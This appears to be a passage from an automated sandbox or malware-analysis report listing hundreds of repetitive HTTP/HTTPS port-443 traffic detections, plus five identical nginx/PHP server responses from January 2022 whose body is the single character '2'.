Source: unknown	Network traffic detected: HTTP traffic on port 50337 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50612 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50763
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50566 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50235 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50510 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50382 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 50783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50591 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50301 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 50656 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50704
Source: unknown	Network traffic detected: HTTP traffic on port 50931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50705
Source: unknown	Network traffic detected: HTTP traffic on port 50247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50522 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50407 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50708
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 50313 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50717
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50716
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50719
Source: unknown	Network traffic detected: HTTP traffic on port 50259 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50534 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50718
Source: unknown	Network traffic detected: HTTP traffic on port 50808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50496 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 50865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 50771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50727
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50720
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 50369 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50644 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50337
Source: unknown	Network traffic detected: HTTP traffic on port 50420 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50336
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50339
Source: unknown	Network traffic detected: HTTP traffic on port 50386 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50338
Source: unknown	Network traffic detected: HTTP traffic on port 50546 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50331
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50330
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50333
Source: unknown	Network traffic detected: HTTP traffic on port 50632 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50332
Source: unknown	Network traffic detected: HTTP traffic on port 50873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50335
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50334
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50305 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50348
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50347
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50349
Source: unknown	Network traffic detected: HTTP traffic on port 50505 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50340
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50342
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50341
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50344
Source: unknown	Network traffic detected: HTTP traffic on port 50243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50343
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50346
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50345
Source: unknown	Network traffic detected: HTTP traffic on port 50673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50359
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50358
Source: unknown	Network traffic detected: HTTP traffic on port 50804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50351
Source: unknown	Network traffic detected: HTTP traffic on port 50317 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50350
Source: unknown	Network traffic detected: HTTP traffic on port 50558 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50353
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50352
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50355
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50354
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50357
Source: unknown	Network traffic detected: HTTP traffic on port 50374 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50356
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50360
Source: unknown	Network traffic detected: HTTP traffic on port 50620 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 50419 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50369
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 50255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 50685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50362
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50361
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50364
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50363
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50366
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50365
Source: unknown	Network traffic detected: HTTP traffic on port 50897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50368
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50367
Source: unknown	Network traffic detected: HTTP traffic on port 50923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50371
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50370
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50779
Source: unknown	Network traffic detected: HTTP traffic on port 50911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50778
Source: unknown	Network traffic detected: HTTP traffic on port 50571 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50774
Source: unknown	Network traffic detected: HTTP traffic on port 50350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50267 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50607 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50362 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50304
Source: unknown	Network traffic detected: HTTP traffic on port 50444 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50303
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50306
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50305
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50789
Source: unknown	Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50308
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50307
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50309
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50780
Source: unknown	Network traffic detected: HTTP traffic on port 50702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50300
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50302
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50301
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50785
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50476 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50315
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50314
Source: unknown	Network traffic detected: HTTP traffic on port 50791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50317
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50316
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50319
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50318
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50279 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50790
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50311
Source: unknown	Network traffic detected: HTTP traffic on port 50394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50619 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50310
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50313
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50797
Source: unknown	Network traffic detected: HTTP traffic on port 50223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50312
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50796
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50349 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50326
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50325
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50328
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50327
Source: unknown	Network traffic detected: HTTP traffic on port 50828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50329
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50320
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50322
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50321
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50324
Source: unknown	Network traffic detected: HTTP traffic on port 50488 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50323
Source: unknown	Network traffic detected: HTTP traffic on port 50746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50432 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50514 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50296
Source: unknown	Network traffic detected: HTTP traffic on port 50915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50295
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50298
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50297
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50299
Source: unknown	Network traffic detected: HTTP traffic on port 50389 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50400 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50377 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50652 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50537 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50308 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50227 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50502 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50550 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50390 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50549 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50481 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50136 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50665 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50365 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50259
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50424 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50252
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50251
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50254
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50253
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50255
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50258
Source: unknown	Network traffic detected: HTTP traffic on port 50353 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50257
Source: unknown	Network traffic detected: HTTP traffic on port 50456 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50261
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50260
Source: unknown	Network traffic detected: HTTP traffic on port 50848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50215 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50574 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50263
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50265
Source: unknown	Network traffic detected: HTTP traffic on port 50639 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50264
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50267
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50266
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50269
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50268
Source: unknown	Network traffic detected: HTTP traffic on port 50264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50270
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50272
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50271
Source: unknown	Network traffic detected: HTTP traffic on port 50677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50468 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50274
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50273
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50276
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50275
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50278
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50277
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50279
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50281
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50283
Source: unknown	Network traffic detected: HTTP traffic on port 50412 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50282
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50341 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50203 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50276 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50285
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50284
Source: unknown	Network traffic detected: HTTP traffic on port 50689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50287
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50286
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50289
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50288
Source: unknown	Network traffic detected: HTTP traffic on port 50893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50290
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50292
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50291
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50294
Source: unknown	Network traffic detected: HTTP traffic on port 50799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50293
Source: unknown	Network traffic detected: HTTP traffic on port 50562 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50627 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50357 -> 443

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 16:59:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:00:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:00:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:00:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 17:01:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21Connection: keep-aliveX-Powered-By: PHP/7.1.33Cache-Control: private, must-revalidatepragma: no-cacheexpires: -1X-RateLimit-Limit: 60X-RateLimit-Remaining: 59Vary: Accept-EncodingContent-Encoding: gzipX-Powered-By: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 e3 02 00 93 06 d7 32 01 00 00 00 Data Ascii: 2
